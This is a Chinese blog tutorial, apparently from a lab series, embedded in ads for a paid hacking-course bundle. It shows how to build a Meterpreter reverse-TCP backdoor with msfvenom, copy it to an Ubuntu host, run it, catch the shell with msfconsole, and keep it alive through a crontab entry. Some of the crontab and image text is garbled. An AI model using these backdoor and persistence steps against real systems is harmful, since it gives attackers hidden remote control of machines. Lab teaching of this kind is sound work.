网络安全: Kali Linux 进行 MSFvenom 程序利用_msfvenom -p linux(2)

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!


![](https://img-blog.csdnimg.cn/direct/985f1a45d8034c1cbeb1f1bdcca8316c.png)


(6) 查看Kali Linux (2022.4)系统IP地址



ip addr | grep 154


![](https://img-blog.csdnimg.cn/direct/2e0c0fbf1fdd4eaf9af10e198a7fb9ef.png)


(7)查看Ubuntu 8.04 系统版本及IP地址



lsb_release -a


![](https://img-blog.csdnimg.cn/direct/a4b468c4a207421895d7f086045f6ffb.png)



ip addr


![](https://img-blog.csdnimg.cn/direct/77c4f4f2b8fb4872b22634c29a0a4f71.png)


### 


### 2. Kali Linux 进行 MSFvenom 程序利用


(1)创建后⻔程序



msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.204.154 lport=4444 -f elf -o shell


![](https://img-blog.csdnimg.cn/direct/b3f969890a65479d9a346be0d94aaa06.png)


![](https://img-blog.csdnimg.cn/direct/a3501f27313249d08c3edb24a219d5fc.png)



(2) 配置ssh文件



vim .ssh/config


![](https://img-blog.csdnimg.cn/direct/196f4dac1bc048288bc6d0d4d165c982.png)



Host *
HostkeyAlgorithms +ssh-rsa
PubkeyAcceptedKeyTypes +ssh-rsa


![](https://img-blog.csdnimg.cn/direct/62acd5f7f7a7459797c9c72be7d2a3c9.png)


(3)植⼊后⻔程序



scp shell root@192.168.204.143:/mnt


![](https://img-blog.csdnimg.cn/direct/149c39517a4d4000bc618c345d8235dd.png)


(4)Ubuntu查看权限



ls -l /mnt


![](https://img-blog.csdnimg.cn/direct/570975f6f41e491c923f5a723a52a5d0.png)


(4)Ubuntu激活后⻔程序



chmod a+x /mnt/shell


![](https://img-blog.csdnimg.cn/direct/d7369ccaaeae426fb4617a90ee740f35.png)


(5)再次查看权限



ls -l /mnt


![](https://img-blog.csdnimg.cn/direct/1017deee91fa452bac7cbe29bf996812.png)


(6)Ubuntu后台执行



/mnt/shell &


![](https://img-blog.csdnimg.cn/direct/5d28e3d784d64e8ab994ce1cc7ca4cf1.png)


(7)Kali Linux 连接后门


新开一个终端



msfconsole


![](https://img-blog.csdnimg.cn/direct/17e28c6ddc824341aa151b9848e71b09.png)


(8)调用侦听模块



use exploit/multi/handler


![](https://img-blog.csdnimg.cn/direct/c54a6285f1ed4200a2a7ba2966684c49.png)


(9)设置响应的IP地址



set lhost 192.168.204.154


## 


(10)设置响应的端口



set lport 4444


## 


(11)设置载荷



set payload linux/x86/meterpreter/reverse_tcp


## 


(12)运行


开启TCP反向侦听



run


![](https://img-blog.csdnimg.cn/direct/9bdcb1846e554688b181ee6ee7b72791.png)


(13)Ubuntu再次后台运行


![](https://img-blog.csdnimg.cn/direct/205e9fcd0d2c4dca9f4f69c5692160a6.png)


(14)已连接


![](https://img-blog.csdnimg.cn/direct/117392738abb433ab86dc596f8d71fa4.png)


(15)查看用户权限及进程


用户



getuid


![](https://img-blog.csdnimg.cn/direct/a69ba6d532e449a3b075e859d86d5869.png)


进程号



getpid


![](https://img-blog.csdnimg.cn/direct/b6cc76a47c584f809c9ab87bf345bf91.png)


(16) 进入内核



shell


![](https://img-blog.csdnimg.cn/direct/a9ba53f99c8042358efe5c5506382b69.png)


查看用户



whoami


![](https://img-blog.csdnimg.cn/direct/829919fb6891408299f9cedbeb814462.png)


查看路径



pwd


![](https://img-blog.csdnimg.cn/direct/b2fa3e41ce864d4a9d467ff474c72815.png)


(17)退出



exit


![](https://img-blog.csdnimg.cn/direct/aada5efba00d45c8ba0c8c7f9934cd05.png)


![](https://img-blog.csdnimg.cn/direct/c007f5752c51402a9d764bb1e14c8527.png)



### 3. 创建计划任务自动运行 MSFvenom 程序


(1)Ubuntu创建计划任务crontab程序



EDITOR=vim crontab -e


![](https://img-blog.csdnimg.cn/direct/3415d31f10bf4dc7869a252f2268b2a9.png)


修改前:


![](https://img-blog.csdnimg.cn/direct/eb83c539a5bf41928e0c29c64e324732.png)


修改后:



m h dom mon dow command

          • /bin/date>>/tmp/time.txt
          • /mnt/shell &

![](https://img-blog.csdnimg.cn/direct/a156f813329c46a5b7f3b2d8c320ab91.png)


(2)Kali Linux 连接后门


新开一个终端



msfconsole


![](https://img-blog.csdnimg.cn/direct/e1f1f2720f404c7babb1306958761947.png)


 (3)调用侦听模块



use exploit/multi/handler


![](https://img-blog.csdnimg.cn/direct/c54a6285f1ed4200a2a7ba2966684c49.png)


(4)设置响应的IP地址



set lhost 192.168.204.154

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以点击这里获取

299721470)]
[外链图片转存中…(img-HgPE7UNw-1715299721471)]
[外链图片转存中…(img-nIK1EA3Y-1715299721472)]
[外链图片转存中…(img-ZizD2qDJ-1715299721473)]
[外链图片转存中…(img-wxcZXWz3-1715299721474)]
[外链图片转存中…(img-6SFRWHIG-1715299721474)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以点击这里获取

  • 17
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值